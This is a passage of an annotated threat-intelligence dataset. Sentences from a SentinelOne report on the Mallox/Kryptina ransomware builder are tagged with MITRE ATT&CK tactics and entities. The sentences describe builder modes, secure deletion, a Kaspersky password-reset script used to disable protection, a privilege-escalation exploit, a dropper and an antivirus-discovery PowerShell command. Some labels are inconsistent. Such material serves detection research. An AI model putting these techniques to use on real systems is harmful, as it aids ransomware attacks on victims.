"sentence_text": "This is then written to the final output file (as the modified/encrypted file).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Finalizes writing of encrypted file", "entities": [ { "text": "written to the final output file ", "start": 13, "end": 46, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s25-3f7bd7", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "This is then written to the final output file (as the modified/encrypted file).", "sentence_text": "EVP_CipherFinal\nfinalizes the processes handling any padding (integral to CBC mode).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s26-ce43ce", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "EVP_CipherFinal\nfinalizes the processes handling any padding (integral to CBC mode).", "sentence_text": "With the exception of the aforementioned Kryptina database, the Kryptina branding has been stripped from most of the source and support files for “Mallox Linux 1.0”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Obfuscate malware identity by removing branding from files", "entities": [ { "text": "Kryptina", "start": 41, "end": 49, "label": "MalwareTool" }, { "text": "“Mallox Linux 1.0”", "start": 146, "end": 164, "label": "MalwareTool" }, { "text": "stripped from most of the source and support files for “Mallox Linux 1.0”.", "start": 91, "end": 165, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s27-66c091", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "With the exception of the aforementioned Kryptina database, the Kryptina branding has been stripped from most of the source and support files for “Mallox Linux 1.0”.", "sentence_text": "Documentation for the Kryptina-derived Mallox variations is included, though it is a distilled version of the original Kryptina documentation.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Provide partial documentation for malware variant, possibly for reuse or analysis", "entities": [ { "text": "Kryptina", "start": 22, "end": 30, "label": "MalwareTool" }, { "text": "Mallox variations", "start": 39, "end": 56, "label": "MalwareTool" }, { "text": "included, though it is a distilled version of the original Kryptina documentation.", "start": 60, "end": 142, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s28-999b81", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "Documentation for the Kryptina-derived Mallox variations is included, though it is a distilled version of the original Kryptina documentation.", "sentence_text": "The original Kryptia PDF (SHA1:\nd46fbc4a57dce813574ee312001eaad0aa4e52de\n) has been slimmed down and included as docs.md .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Provide partial documentation of malware, potentially for internal development or reuse", "entities": [ { "text": "Kryptia", "start": 13, "end": 20, "label": "MalwareTool" }, { "text": "slimmed down and included as docs.md .", "start": 84, "end": 122, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s29-c830f6", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "The original Kryptia PDF (SHA1:\nd46fbc4a57dce813574ee312001eaad0aa4e52de\n) has been slimmed down and included as docs.md .", "sentence_text": "Included sections have been translated to Russian from the original English version.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Translate malware documentation for wider use or collaboration", "entities": [ { "text": "translated to Russian from the original English version.", "start": 28, "end": 84, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s30-fab87d", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "Included sections have been translated to Russian from the original English version.", "sentence_text": "The affiliate made a few changes to the Kryptina source files and scripts in order to remove references to Kryptina and associate the comments and naming conventions to those of Mallox.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Rebrand malware by modifying source code and metadata", "entities": [ { "text": "affiliate ", "start": 4, "end": 14, "label": "ThreatActor" }, { "text": "Kryptina source files and scripts", "start": 40, "end": 73, "label": "MalwareTool" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s31-bf0b87", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "The affiliate made a few changes to the Kryptina source files and scripts in order to remove references to Kryptina and associate the comments and naming conventions to those of Mallox.", "sentence_text": "Ransom note templates are structured similarly to the original Kryptina version.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Copy and adapt ransom note templates from prior malware version", "entities": [ { "text": "Ransom note templates", "start": 0, "end": 21, "label": "MalwareTool" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s32-7ba895", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Ransom note templates are structured similarly to the original Kryptina version.", "sentence_text": "The \\note folder on the affiliate server contains the template source, which can be customized directly or via the Kryptina web UI.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "customize ransom note template", "entities": [ { "text": " affiliate", "start": 23, "end": 33, "label": "ThreatActor" }, { "text": "Kryptina", "start": 115, "end": 123, "label": "MalwareTool" }, { "text": "\\note folder on the affiliate server", "start": 4, "end": 40, "label": "Infrastructure_Indicator" }, { "text": " template source, which can be customized", "start": 53, "end": 94, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s33-173459", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "The \\note folder on the affiliate server contains the template source, which can be customized directly or via the Kryptina web UI.", "sentence_text": "The template for the ransom note was updated to remove the Kryptina 2.x references, replacing them with Mallox v1.0.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s34-b055b7", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The template for the ransom note was updated to remove the Kryptina 2.x references, replacing them with Mallox v1.0.", "sentence_text": "The main source files for “Mallox 1.0” were held in the /src folder of the affiliate server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s35-340fcd", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "The main source files for “Mallox 1.0” were held in the /src folder of the affiliate server.", "sentence_text": "The original names of the encryptor and decryptor source files ( kryptina.c and kryptina.h ) retain the Kryptina-centric names.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s36-577cfc", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "The original names of the encryptor and decryptor source files ( kryptina.c and kryptina.h ) retain the Kryptina-centric names.", "sentence_text": "The only operational change to the Kryptina encryptor code is the updating of printed output in Debug mode (updated to Mallox).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s37-e4e810", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "The only operational change to the Kryptina encryptor code is the updating of printed output in Debug mode (updated to Mallox).", "sentence_text": "Kryptina’s original\nscripting_demo.py\nfile provided threat actors with a way to build Linux payloads via the command line.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s38-d82509", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Kryptina’s original\nscripting_demo.py\nfile provided threat actors with a way to build Linux payloads via the command line.", "sentence_text": "All the requisite fields are provided in the template.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s39-aa73e3", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "All the requisite fields are provided in the template.", "sentence_text": "This allows for quick and automated builds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s40-e57a2d", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "This allows for quick and automated builds.", "sentence_text": "While these scripted builds are not reflected in the web UI, it can be a valuable tool to a threat actor wanting to streamline the automation of new builds over time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s41-e114de", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "While these scripted builds are not reflected in the web UI, it can be a valuable tool to a threat actor wanting to streamline the automation of new builds over time.", "sentence_text": "The scripting_demo.py file has been minimally updated, again to reflect Mallox branding over Kryptina.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s42-23e6e3", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "The scripting_demo.py file has been minimally updated, again to reflect Mallox branding over Kryptina.", "sentence_text": "References to “Corlys” have been removed as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s43-1a657f", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "References to “Corlys” have been removed as well.", "sentence_text": "Comparing Kryptina and Mallox makefiles The makefile is used when building encryptor and decryptor payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s44-05f1e4", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "Comparing Kryptina and Mallox makefiles The makefile is used when building encryptor and decryptor payloads.", "sentence_text": "This can be called directly via script, or via the web UI while building payloads within campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s45-b0559b", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "This can be called directly via script, or via the web UI while building payloads within campaigns.", "sentence_text": "Kryptina (and subsequently Mallox 1.0) supports multiple modes within the compiled payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s46-ad19d2", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "Kryptina (and subsequently Mallox 1.0) supports multiple modes within the compiled payloads.", "sentence_text": "These are:\ndemo – builds a demo version of Kryptina, no encryption debug – provides customized debug output symbols – provides debug build with debug symbols (-ggdb3)\narch32 – output 32-bit payload", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s47-ef4f79", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "These are:\ndemo – builds a demo version of Kryptina, no encryption debug – provides customized debug output symbols – provides debug build with debug symbols (-ggdb3)\narch32 – output 32-bit payload", "sentence_text": "Additional parameter values are provided for other conditions present in the builder.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s48-d8e328", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "Additional parameter values are provided for other conditions present in the builder.", "sentence_text": "Secure deletion (wiper’esque capability) can be toggled via the secdel parameter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s49-d93453", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "Secure deletion (wiper’esque capability) can be toggled via the secdel parameter.", "sentence_text": "Example makefiles from the original Kryptina package and the Mallox-modified package appear as follows:\nVictim Subfolders\nThe May 2024 affiliate leak also contained target-specific output folders for 14 targets (potential victims).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s50-c5f2fd", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Example makefiles from the original Kryptina package and the Mallox-modified package appear as follows:\nVictim Subfolders\nThe May 2024 affiliate leak also contained target-specific output folders for 14 targets (potential victims).", "sentence_text": "Some of this information was previously detailed here In the \\output folder, subfolders exist for each target (unique ‘Target Name’ value).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s51-a7413b", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "Some of this information was previously detailed here In the \\output folder, subfolders exist for each target (unique ‘Target Name’ value).", "sentence_text": "Some of these folders contain config.json files (builder configuration) alongside the matching encryptor/decryptor binary pairs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s52-cb21ca", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Some of these folders contain config.json files (builder configuration) alongside the matching encryptor/decryptor binary pairs.", "sentence_text": "Each of the config files contains values for all the fields required in the builder scripts.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "Populating configuration files for malware builder scripts", "entities": [ { "text": "builder scripts.", "start": 76, "end": 92, "label": "MalwareTool" }, { "text": "contains values for all the fields required in the builder scripts.", "start": 25, "end": 92, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s53-713cc3", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "Each of the config files contains values for all the fields required in the builder scripts.", "sentence_text": "This includes payment type and addresses.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "Configured payment types and addresses in malware configuration", "entities": [ { "text": "payment type and addresses.", "start": 14, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "includes payment type and addresses.", "start": 5, "end": 41, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s54-1fb08f", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "This includes payment type and addresses.", "sentence_text": "The configuration JSON contains values for the following:\nSeven of the victim subfolders contained corresponding config.json files and compiled encryptor & decryptor tools.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "Prepared and stored configuration and malware binaries across victim subfolders", "entities": [ { "text": "config.json files and compiled encryptor & decryptor tools.", "start": 113, "end": 172, "label": "MalwareTool" }, { "text": "contains values for the following", "start": 23, "end": 56, "label": "Action" }, { "text": "contained corresponding config.json files and compiled encryptor & decryptor tools.", "start": 89, "end": 172, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s55-a76f9d", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "The configuration JSON contains values for the following:\nSeven of the victim subfolders contained corresponding config.json files and compiled encryptor & decryptor tools.", "sentence_text": "All of the JSON files have similar values assigned for the requisite field.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s56-ca7845", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "All of the JSON files have similar values assigned for the requisite field.", "sentence_text": "All of the targets were configured with the same payment address (BTC 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 ).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s57-0cb40f", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "All of the targets were configured with the same payment address (BTC 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 ).", "sentence_text": "Other requisite values are repeated across campaigns as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s58-5dc273", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "Other requisite values are repeated across campaigns as well.", "sentence_text": "This includes the values for “key”, “bitcoin” and “extension”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s59-72377b", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "This includes the values for “key”, “bitcoin” and “extension”.", "sentence_text": "The extension on all fully-configured builds (potentially separate attack campaigns) is .lmallox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s60-381490", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "The extension on all fully-configured builds (potentially separate attack campaigns) is .lmallox", "sentence_text": "Tox ID: 290E6890D02FBDCD92659056F9A95D80854534A4D76EE5D3A64AFD55E584EA398722EC2D3697)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s61-9a9980", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "Tox ID: 290E6890D02FBDCD92659056F9A95D80854534A4D76EE5D3A64AFD55E584EA398722EC2D3697)", "sentence_text": "What Else Was Leaked?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s62-15abf2", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "What Else Was Leaked?", "sentence_text": "The tools identified on the affiliate server were not limited to Linux victims.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Deploy or maintain tools capable of targeting multiple OS environments", "entities": [ { "text": " affiliate server", "start": 27, "end": 44, "label": "ThreatActor" }, { "text": "tools", "start": 4, "end": 9, "label": "MalwareTool" }, { "text": "tools identified on the affiliate server were not limited to Linux victims", "start": 4, "end": 78, "label": "MalwareTool" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s63-323733", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "The tools identified on the affiliate server were not limited to Linux victims.", "sentence_text": "A small cache of tools and exploits which target the Windows platform were also hosted.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Maintain Windows-targeted tools for potential attacks", "entities": [ { "text": "tools and exploits which target the Windows", "start": 17, "end": 60, "label": "MalwareTool" }, { "text": "cache", "start": 8, "end": 13, "label": "Infrastructure_Indicator" }, { "text": " target the Windows platform were also hosted.", "start": 41, "end": 87, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s64-26fa3a", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "A small cache of tools and exploits which target the Windows platform were also hosted.", "sentence_text": "These are utilized by the threat actor in the early stages of attack, primarily for beachhead establishment and privilege escalation.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Early-stage tool usage for foothold and privilege escalation", "entities": [ { "text": "threat actor", "start": 26, "end": 38, "label": "ThreatActor" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s65-8cf6b8", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "These are utilized by the threat actor in the early stages of attack, primarily for beachhead establishment and privilege escalation.", "sentence_text": "KLAPR.ZIP\nextracts to\nKLAPR.BAT\n(SHA1:\n43377911601247920dc15e9b22eda4c57cb9e743\n).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Delivery/preparation of malware for execution", "entities": [ { "text": "KLAPR.BAT", "start": 22, "end": 31, "label": "MalwareTool" }, { "text": "KLAPR.ZIP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "extracts to\nKLAPR.BAT", "start": 10, "end": 31, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s66-3e494b", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "KLAPR.ZIP\nextracts to\nKLAPR.BAT\n(SHA1:\n43377911601247920dc15e9b22eda4c57cb9e743\n).", "sentence_text": "This tool is provided by the affiliate to assist in the neutralization of Kaspersky endpoint products where needed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1089", "name": "Disabling Security Tools" } ], "procedure": "Security product neutralization", "entities": [ { "text": "affiliate", "start": 29, "end": 38, "label": "ThreatActor" }, { "text": "This tool", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "neutralization of Kaspersky endpoint products", "start": 56, "end": 101, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s67-ebd790", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "This tool is provided by the affiliate to assist in the neutralization of Kaspersky endpoint products where needed.", "sentence_text": "This binary is a copy of the “Kaspersky Lab AllProducts Password Reset v2.0” tool.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1089", "name": "Disabling Security Tools" } ], "procedure": "Preparation of tool for endpoint neutralization", "entities": [ { "text": "Kaspersky Lab AllProducts Password Reset v2.0", "start": 30, "end": 75, "label": "MalwareTool" }, { "text": "copy ", "start": 17, "end": 22, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s68-338d02", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "This binary is a copy of the “Kaspersky Lab AllProducts Password Reset v2.0” tool.", "sentence_text": "This is a legitimate support tool from Kaspersky Labs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s69-c78a5f", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "This is a legitimate support tool from Kaspersky Labs.", "sentence_text": "Specific security products from Kaspersky require an application-specific password to allow for changing of configuration settings (locally) or other management tasks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s70-b7fd6c", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "Specific security products from Kaspersky require an application-specific password to allow for changing of configuration settings (locally) or other management tasks.", "sentence_text": "This .BAT file resets (nullifies) the stored password values for a multitude of Kaspersky products.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Impair Defenses: Disable or Modify Tools" } ], "procedure": "A script resets stored passwords for security software to bypass or disable protection mechanisms.", "entities": [ { "text": ".BAT file", "start": 5, "end": 14, "label": "MalwareTool" }, { "text": "resets (nullifies) the stored password values", "start": 15, "end": 60, "label": "Action" }, { "text": "Kaspersky products", "start": 80, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s71-8ed86d", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "This .BAT file resets (nullifies) the stored password values for a multitude of Kaspersky products.", "sentence_text": "Exploit code for CVE-2024-21338 is included as well.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "use of exploit targeting CVE-2024-21338", "entities": [ { "text": "Exploit code for CVE-2024-21338", "start": 0, "end": 31, "label": "MalwareTool" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s72-07d2e6", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "Exploit code for CVE-2024-21338 is included as well.", "sentence_text": "CVE-2024-21338 is a local privilege escalation flaw in Windows 10 and 11 where HVCI (Hypervisor-Protected Code Integrity) is enabled.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "exploitation of CVE-2024-21338 for privilege escalation", "entities": [ { "text": "CVE-2024-21338", "start": 0, "end": 14, "label": "MalwareTool" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s73-dfdcc2", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "CVE-2024-21338 is a local privilege escalation flaw in Windows 10 and 11 where HVCI (Hypervisor-Protected Code Integrity) is enabled.", "sentence_text": "This exploit is based on the proof-of-concept code provided in a writeup from Hakai Security.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "leveraging publicly available PoC exploit code", "entities": [ { "text": " exploit is based on the proof-of-concept code", "start": 4, "end": 50, "label": "MalwareTool" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s74-d6cf77", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "This exploit is based on the proof-of-concept code provided in a writeup from Hakai Security.", "sentence_text": "This script, hosted at the root of the open directory, provides a template for PowerShell privilege escalation and payload execution.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" }, { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "provides a template for PowerShell privilege escalation and payload execution", "entities": [ { "text": "script", "start": 5, "end": 11, "label": "MalwareTool" }, { "text": " PowerShell ", "start": 78, "end": 90, "label": "MalwareTool" }, { "text": "privilege escalation and payload execution", "start": 90, "end": 132, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s75-32b213", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "This script, hosted at the root of the open directory, provides a template for PowerShell privilege escalation and payload execution.", "sentence_text": "Some basic environmental discovery commands are included (e.g., Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct ).", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1518.001", "name": "Software Discovery: Security Software Discovery" } ], "procedure": "The attacker uses system commands to query installed security software via WMI.", "entities": [ { "text": "environmental discovery commands are included", "start": 11, "end": 56, "label": "Action" }, { "text": "Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct", "start": 64, "end": 135, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s76-798a23", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "Some basic environmental discovery commands are included (e.g., Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct ).", "sentence_text": "A Mallox (Windows) dropper named Application.jar (SHA1:\n5cf67c0a1fa06101232437bee5111fefcd8e2df4\n) was also present.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s77-7263f8", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "A Mallox (Windows) dropper named Application.jar (SHA1:\n5cf67c0a1fa06101232437bee5111fefcd8e2df4\n) was also present.", "sentence_text": "This dropper launches a PowerShell script that downloads a copy of Mallox from the same server (as id.exe ; SHA1:\n0f1aea2cf0c9f2de55d2b920618a5948c5e5e119\n).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "launches a PowerShell script that downloads a copy of Mallox from the same server", "entities": [ { "text": "dropper", "start": 5, "end": 12, "label": "MalwareTool" }, { "text": "PowerShell script", "start": 24, "end": 41, "label": "MalwareTool" }, { "text": " Mallox", "start": 66, "end": 73, "label": "MalwareTool" }, { "text": "id.exe", "start": 99, "end": 105, "label": "MalwareTool" }, { "text": "0f1aea2cf0c9f2de55d2b920618a5948c5e5e119", "start": 114, "end": 154, "label": "Infrastructure_Indicator" }, { "text": "same server", "start": 83, "end": 94, "label": 